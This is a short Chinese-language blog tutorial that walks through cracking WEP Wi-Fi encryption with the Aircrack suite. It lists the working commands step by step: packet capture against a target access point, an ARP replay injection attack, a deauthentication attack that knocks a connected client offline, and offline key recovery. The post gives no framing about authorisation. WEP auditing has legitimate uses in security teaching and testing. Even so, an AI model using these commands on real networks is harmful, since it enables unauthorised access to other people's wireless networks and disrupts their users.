WEP无线加密破解
工具:Aircrack套件(airmon-ng、airodump-ng、aireplay-ng)
带有套件的操作系统:KaLi Linux、BackTrack、Beini(奶瓶)...等
1.开启无线网卡混杂模式(参考BackTrack 5无线网卡混杂模式设置)
2.用airodump-ng -i mon0 命令查看周围无线AP情况
黄色标记为WEP加密AP
AP的MAC地址:20:DC:E6:6C:48:DE
AP的SSID名称:mynetwork
AP工作信道:6
3.用airodump-ng -i mon0 --bssid 20:DC:E6:6C:48:DE -c 6 --ivs -w mynetwork 捕获AP数据包
mynetwork 为数据保存文件名
黄色标记为连接AP的客户端
客户端的MAC地址:08:ED:B9:55:58:D8
4.用aireplay-ng -3 -b 20:DC:E6:6C:48:DE -h 08:ED:B9:55:58:D8 mon0 命令进行ARP攻击,加大数据流量,有利于短时间捕获大量数据包
红色标记为有效攻击的数据包数量
5.用aireplay-ng -0 10 -a 20:DC:E6:6C:48:DE -c 08:ED:B9:55:58:D8 mon0 命令进行冲突攻击,迫使客户端掉线,使得步骤4的ARP攻击生效
间断重复进行,直到步骤3图示蓝色标记处数值达到20000左右
若步骤3中蓝色标记处数值增长很快,可不用进行步骤4、5,等待数值增长至20000左右即可
6.用aircrack-ng mynetwork*.ivs 命令对捕获的数据包进行密码破解
作者:rainmote
博客:http://www.cnblogs.com/rainmote
本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可。
欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文连接。